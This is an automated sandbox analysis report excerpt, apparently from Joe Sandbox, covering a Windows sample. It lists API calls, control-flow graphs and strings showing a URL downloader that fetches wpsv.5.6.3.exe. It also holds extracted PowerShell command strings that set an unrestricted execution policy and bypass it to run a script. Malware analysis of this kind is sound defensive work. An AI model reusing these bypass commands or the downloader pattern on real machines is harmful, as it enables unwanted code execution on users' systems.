                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: 902e23e6e2c558fabe42d0862c9577194d6b3774d660575b183d7f6ebdea202e
                                                                                    • Instruction ID: a79f3244e1dae306cfdd43c11d9e05b1965ff1ec8325b00f92b99aced98e3e72
                                                                                    • Opcode Fuzzy Hash: 902e23e6e2c558fabe42d0862c9577194d6b3774d660575b183d7f6ebdea202e
                                                                                    • Instruction Fuzzy Hash: D8F0B472550608EED710FB79CD9298DBBECEB4431576005B6F400F32D2EA385F00551C
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoSystem
                                                                                    • String ID:
                                                                                    • API String ID: 31276548-0
                                                                                    • Opcode ID: 899fa9c962831e78d20aa585cacba709b3b6a16b28d6df11c32fd39be051b51c
                                                                                    • Instruction ID: 47ab257af6e364695ea890f9b43c82e37ccfc4e8ddd737aab863078b62403aa0
                                                                                    • Opcode Fuzzy Hash: 899fa9c962831e78d20aa585cacba709b3b6a16b28d6df11c32fd39be051b51c
                                                                                    • Instruction Fuzzy Hash: 0DA012108084001AC404BB194C4340F39C45941514FC40264745CB56C2E61A866403DB

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _Smanip.LIBCPMTD ref: 10005DF2
                                                                                    • _Smanip.LIBCPMTD ref: 1000A195
                                                                                      • Part of subcall function 10005400: HandleT.LIBCPMTD ref: 1000546A
                                                                                    • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,?,?,000000FF), ref: 1000A35B
                                                                                    • _Smanip.LIBCPMTD ref: 1000A3C6
                                                                                    • _Smanip.LIBCPMTD ref: 1000A4D7
                                                                                      • Part of subcall function 10005520: DeleteFileA.KERNEL32(100108FE,?,100108FE,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                      • Part of subcall function 10005300: ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                      • Part of subcall function 10005300: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1001092F,000000FF,?), ref: 10005384
                                                                                      • Part of subcall function 10005300: SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                    • Sleep.KERNEL32(000000C8,?,00000000,?,?,?,?,0000005C,?), ref: 1000A5D3
                                                                                    • _Smanip.LIBCPMTD ref: 1000A630
                                                                                    • _Smanip.LIBCPMTD ref: 1000A764
                                                                                    • Sleep.KERNEL32(000000C8,?,00000000), ref: 1000AB7C
                                                                                    • _Smanip.LIBCPMTD ref: 1000ADA7
                                                                                    • _Smanip.LIBCPMTD ref: 1000AE64
                                                                                    • WinExec.KERNEL32(00000000,00000000), ref: 1000AF3E
                                                                                    • Sleep.KERNEL32(000003E8,?,?,?,00000063,?,00000070,?,?,00000000), ref: 1000AF49
                                                                                    • _Smanip.LIBCPMTD ref: 1000B046
                                                                                    • _Smanip.LIBCPMTD ref: 1000B0E2
                                                                                    • memset.VCRUNTIME140(?,00000000,00000038), ref: 1000B20A
                                                                                    • ShellExecuteExA.SHELL32(?), ref: 1000B266
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1000B282
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1000B28F
                                                                                    • Sleep.KERNEL32(000003E8), ref: 1000B3A8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Smanip$Sleep$FileHandle$?write@?$basic_ostream@AttributesBios_base@std@@CloseD@std@@@std@@DeleteExecExecuteObjectPathShellSingleTempU?$char_traits@V12@Waitmemset
                                                                                    • String ID: .NET Framework Action$/C $\PolicyManagement.xml$cmd.exe /C $powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"$powershell -ExecutionPolicy Bypass -File
                                                                                    • API String ID: 1867003993-3862442261
                                                                                    • Opcode ID: e5c84668ff2e0361885bbcf03fb5359e18a06ac4a9dd02aafd23a928fb285933
                                                                                    • Instruction ID: c3f484f0cadaf97ba32f422996ffd4aa446fbc6566911116cce282fd85213db7
                                                                                    • Opcode Fuzzy Hash: e5c84668ff2e0361885bbcf03fb5359e18a06ac4a9dd02aafd23a928fb285933
                                                                                    • Instruction Fuzzy Hash: 2FD36A50D0D6E8C9EB22C2288C587DDBEB55B22749F4441D9819C2A283C7BF1FD9CF66

Control-flow Graph

APIs
• InternetOpenA.WININET(URLDownloader,00000001,00000000,00000000,00000000), ref: 100020D3
• InternetOpenUrlA.WININET(?,?,00000000,00000000,80000000,00000000), ref: 100020EF
• fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,1001844C,?,?,10017512,000000FF), ref: 10002101
• HttpQueryInfoW.WININET(?,20000005,00000000,00000004,00000000), ref: 10002136
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 10002153
  • Part of subcall function 10001D60: VariantInit.OLEAUT32(?), ref: 10001D6B
  • Part of subcall function 10001D80: VariantClear.OLEAUT32(10002776), ref: 10001D8B
  • Part of subcall function 10001A20: _com_issue_error.COMSUPP ref: 10001A92
• InternetReadFile.WININET(?,?,00001000,?), ref: 1000216E
• fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 10002197
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 10002230
• fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 10002240
• InternetCloseHandle.WININET(?), ref: 1000224D
• InternetCloseHandle.WININET(?), ref: 10002257
• GetParent.USER32(?), ref: 10002261
• ShowWindow.USER32(?,00000000,?,000000FF), ref: 10002270
• WaitForSingleObject.KERNEL32(0000050C,00007530,?,000000FF), ref: 10002282
• CoInitializeEx.OLE32(00000000,00000000,?,000000FF), ref: 1000228C
• CoCreateInstance.OLE32(1001837C,00000000,00000001,1001836C,00000000), ref: 100022AE
• Sleep.KERNEL32(000003E8), ref: 1000291A
  • Part of subcall function 10001E30: VariantInit.OLEAUT32(?), ref: 10001EAA
• Sleep.KERNEL32(000003E8), ref: 1000287F
  • Part of subcall function 10001FA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001FAD
• exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10002928
Strings
Memory Dump Source
• Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: Internet$Variant$CloseCreateHandleInitMessageOpenSendSleep$ClearFileHttpInfoInitializeInstanceObjectParentQueryReadShowSingleSnapshotToolhelp32WaitWindow_com_issue_errorexitfclosefopenfwrite
• String ID: .NET Framework Action$.NET Framework Action$.NET Framework Action$Pou$URLDownloader$wpsv.5.6.3.exe
• API String ID: 2588663270-16662377
• Opcode ID: a0ac462626c3a7957670ed2b0b3d2cc14aaf3fc45bf9131736584503c0dd6dd9
• Instruction ID: 1a265d8126e776f6a60fe0a7d1a5fce7a7262b6fb56b0006430606afee9c3406
• Opcode Fuzzy Hash: a0ac462626c3a7957670ed2b0b3d2cc14aaf3fc45bf9131736584503c0dd6dd9
• Instruction Fuzzy Hash: 89427DB4E012289FDB64CF59C895BDDBBB5BF49300F1082DAE909A7355DB30AA85CF50

Control-flow Graph

control_flow_graph 589 1000a2b4-1000b26e GetTempPathA call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10012620 call 10002e20 call 10005250 call 10001cd0 call 10011770 call 10012640 call 10005400 call 100138d0 call 10002cb0 call 10012620 call 10002b60 call 10005520 call 10002b60 call 10002da0 call 10005300 call 10002cb0 Sleep call 10002b60 call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10002e20 call 10005250 call 10002cb0 call 10012620 call 10002cb0 call 10002b60 call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10002e20 call 10005250 call 10002cd0 call 10002cb0 * 2 call 10012620 call 10002cb0 call 100139a0 call 10013a30 * 11 call 10002cb0 * 11 call 10002b60 call 10005520 call 10002b60 call 10002da0 call 10005300 call 10002cb0 Sleep call 10001cd0 call 10011770 call 10012640 call 10005400 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10013890 call 10002cb0 call 10012620 call 10002cb0 call 10012620 call 10002b60 WinExec Sleep call 10001cd0 call 10011770 call 10012640 call 10005400 call 10012620 call 10002b60 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10003bc0 call 10003b90 call 10002cd0 call 10002cb0 * 3 call 10012620 memset call 10002b60 ShellExecuteExA 804 1000b270-1000b277 589->804 805 1000b29b-1000b39e call 10002cb0 * 12 call 10012620 * 2 call 10002cb0 * 2 589->805 807 1000b296 804->807 808 1000b279-1000b295 WaitForSingleObject CloseHandle 804->808 810 1000b3a3-1000b548 Sleep call 10002b60 call 10002da0 call 10005740 call 10002cb0 call 10002b60 call 10002da0 call 10005740 call 10002cb0 call 10002b60 call 10005520 call 10002b60 call 10005520 call 10002cb0 * 12 call 10012620 * 2 call 10002cb0 * 2 805->810 871 1000b54e-1000b561 805->871 807->810 808->807 810->871
APIs
• GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,?,?,000000FF), ref: 1000A35B
• _Smanip.LIBCPMTD ref: 1000A3C6
  • Part of subcall function 10005400: HandleT.LIBCPMTD ref: 1000546A
• _Smanip.LIBCPMTD ref: 1000A4D7
  • Part of subcall function 10005520: DeleteFileA.KERNEL32(100108FE,?,100108FE,00000000,?,?,?,0000005C,?), ref: 10005527
  • Part of subcall function 10005300: ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
  • Part of subcall function 10005300: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1001092F,000000FF,?), ref: 10005384
  • Part of subcall function 10005300: SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
• Sleep.KERNEL32(000000C8,?,00000000,?,?,?,?,0000005C,?), ref: 1000A5D3
• _Smanip.LIBCPMTD ref: 1000A630
• _Smanip.LIBCPMTD ref: 1000A764
• Sleep.KERNEL32(000000C8,?,00000000), ref: 1000AB7C
• _Smanip.LIBCPMTD ref: 1000ADA7
• _Smanip.LIBCPMTD ref: 1000AE64
• WinExec.KERNEL32(00000000,00000000), ref: 1000AF3E
• Sleep.KERNEL32(000003E8,?,?,?,00000063,?,00000070,?,?,00000000), ref: 1000AF49
• _Smanip.LIBCPMTD ref: 1000B046
• _Smanip.LIBCPMTD ref: 1000B0E2
• memset.VCRUNTIME140(?,00000000,00000038), ref: 1000B20A
• ShellExecuteExA.SHELL32(?), ref: 1000B266
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1000B282
• CloseHandle.KERNEL32(00000000), ref: 1000B28F
• Sleep.KERNEL32(000003E8), ref: 1000B3A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: Smanip$Sleep$FileHandle$?write@?$basic_ostream@AttributesBios_base@std@@CloseD@std@@@std@@DeleteExecExecuteObjectPathShellSingleTempU?$char_traits@V12@Waitmemset
• String ID: /C $\PolicyManagement.xml$cmd.exe /C $powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"$powershell -ExecutionPolicy Bypass -File
• API String ID: 1867003993-2154795836
• Opcode ID: e68f2c6455a0b5301ba84bb44f9687bda6d9f088c6ff90b02e06671e58714ec3
• Instruction ID: 5ee5c772d32b0c25501e7099b99da70bcf1678fc7b94072c772d4481403b0835
• Opcode Fuzzy Hash: e68f2c6455a0b5301ba84bb44f9687bda6d9f088c6ff90b02e06671e58714ec3
• Instruction Fuzzy Hash: 88B24C74C08298DEEB25CB68CC45BDEBBB5AF15304F0441D9E14D67292DBB52B88CF62

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040C6B5,?,?), ref: 0040C4C9
• RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040C6B5,?,?), ref: 0040C512
• RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040C6B5,?,?), ref: 0040C534
• RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040C552
• RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040C570
• RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040C58E
• RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040C5AC
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040C698,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040C6B5), ref: 0040C5EC
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040C698,?,80000001), ref: 0040C617
• RegCloseKey.ADVAPI32(?,0040C69F,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040C698,?,80000001,Software\Embarcadero\Locales), ref: 0040C692
Strings
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: Open$QueryValue$CloseFileModuleName
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
• API String ID: 2701450724-3496071916
• Opcode ID: ec5a7b2449134f7d5dfed0d4a478582841b94be27ba8f16343ce714d667d3cea
• Instruction ID: b87a276e91c0abd92e6ddb5251d81d319347be4625686c9aa575414df8f97b10
• Opcode Fuzzy Hash: ec5a7b2449134f7d5dfed0d4a478582841b94be27ba8f16343ce714d667d3cea
• Instruction Fuzzy Hash: B251F575A50208FEDB20EB95CC82FAE77ECDB08704F5045BBB604F62C1D6789A449B5D

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: LibraryLoad
• String ID: 2$2$2$3$3$_$e$r$s$s$u$w
• API String ID: 1029625771-3744707172
• Opcode ID: e1859733eebfcf2fbf4a0b9e0044de51f9309db16f947cee2db2299615c06c83
• Instruction ID: 27e9f1c01ee5c9c2bc4191f5b7c330e1c9f60075257b6c3fc99aa86c3d286dbd
• Opcode Fuzzy Hash: e1859733eebfcf2fbf4a0b9e0044de51f9309db16f947cee2db2299615c06c83
• Instruction Fuzzy Hash: AA518BB5E10248AFDB00DFA1D9819BE7F71AB45304F50809DE9481F342E6B99B16CBA1

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(00000000), ref: 10001682
  • Part of subcall function 10001430: SHGetKnownFolderPath.SHELL32(10018310,00000000,00000000,00000000), ref: 1000148B
  • Part of subcall function 10001430: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 100014AA
  • Part of subcall function 10001430: CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100014DE
• CreateThread.KERNEL32(00000000,00000000,10005760,00000000,00000000,00000000), ref: 10001798
• RegisterClassW.USER32(?), ref: 100017F7
• GetSystemMetrics.USER32(00000001), ref: 100017FF
• GetSystemMetrics.USER32(00000000), ref: 10001812
• CreateWindowExW.USER32(00000000,?,?,00C40000,?,?,00000190,00000078,00000000,00000000,00000000,00000000), ref: 1000185E
• ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,10017426), ref: 1000186D
• KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 10001894
• TranslateMessage.USER32(?), ref: 100018A2
• DispatchMessageW.USER32(?), ref: 100018AC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: CreateMessageMetricsSystemWindow$CallbackClassDispatchDispatcherFolderFreeHandleKnownModulePathRegisterShowTaskThreadTranslateUserwcstombs
• String ID: URLDownloader$wpsv.5.6.3.exe
• API String ID: 73900685-244475150
• Opcode ID: 427fb0662738fb6037c45c3c081c75d8746fa49f42a236919258716a76932914
• Instruction ID: 8631f2352c9d4e8355fdf3fc5455be072e9b283b4b7067b2d869b395449685d5
• Opcode Fuzzy Hash: 427fb0662738fb6037c45c3c081c75d8746fa49f42a236919258716a76932914
• Instruction Fuzzy Hash: 807110B5D00218EFEB54CFA4CC45FDEBBB4EB48700F108169E619A7295EB74AA44CF51

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • InitCommonControlsEx.COMCTL32(00000008), ref: 10001903
                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 1000190D
                                                                                    • CreateWindowExW.USER32(00000000,msctls_progress32,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 10001933
                                                                                    • SetWindowTheme.UXTHEME(00020400,10018438,10018434), ref: 1000194E
                                                                                    • SendMessageW.USER32(00020400,00000409,00000000,00D77800), ref: 10001967
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C), ref: 10001978
                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000019F0,?,00000000,00000000), ref: 100019B9
                                                                                    • PostQuitMessage.USER32(00000000), ref: 100019C4
                                                                                    • DefWindowProcW.USER32(00000002,?,?,?), ref: 100019DD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CreateMessage$CommonControlsHandleInitModulePostProcQuitSendThemeThreadmalloc
                                                                                    • String ID: $msctls_progress32$3Ro
                                                                                    • API String ID: 1181878002-754273676
                                                                                    • Opcode ID: f1c3b5bd482cc1038fd523d6cd0664b2522f3065c76e0cbb8d44deae0c0665e8
                                                                                    • Instruction ID: 07dac4f513f804ff03a6516b31f22f63e0bdfab53d31000085bea38267b703f6
                                                                                    • Opcode Fuzzy Hash: f1c3b5bd482cc1038fd523d6cd0664b2522f3065c76e0cbb8d44deae0c0665e8
                                                                                    • Instruction Fuzzy Hash: 03310675A40218FFF750CF94CC9AFAA77B4FB48701F208118FA05AA290C770DA00CB65

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 10015750: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10015783
                                                                                      • Part of subcall function 10015700: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001571E
                                                                                    • _Smanip.LIBCPMTD ref: 10015B0A
                                                                                    • _Smanip.LIBCPMTD ref: 10015BA4
                                                                                    • memset.VCRUNTIME140(?,00000000,00000038,?,?,?,0000002F,?,00000070,?), ref: 10015C85
                                                                                    • ShellExecuteExA.SHELL32(0000003C,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015CE1
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015CFD
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015D0A
                                                                                    • CopyFileA.KERNEL32(00000000,?,00000000), ref: 10015D73
                                                                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 10015D99
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$ExecuteModuleNameShellSmanip$CloseCopyHandleObjectSingleWaitmemset
                                                                                    • String ID: %s\%s$open
                                                                                    • API String ID: 1843445691-538903891
                                                                                    • Opcode ID: 0874a88fbfece6f8bf1c8d8ced0699038052d698083af6ca92b648841300b0f5
                                                                                    • Instruction ID: 9eb432f15a048c8dfdefea35090f5a4ff5850cd705bbf9561c51413f96cb23ad
                                                                                    • Opcode Fuzzy Hash: 0874a88fbfece6f8bf1c8d8ced0699038052d698083af6ca92b648841300b0f5
                                                                                    • Instruction Fuzzy Hash: 48021374C083D8DEEB11CBA4C859BDDBFB5AF15304F0441D9D1496B282DBBA5B88CB62

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F,?,?,00000000,00000000,00000000), ref: 0040C17A
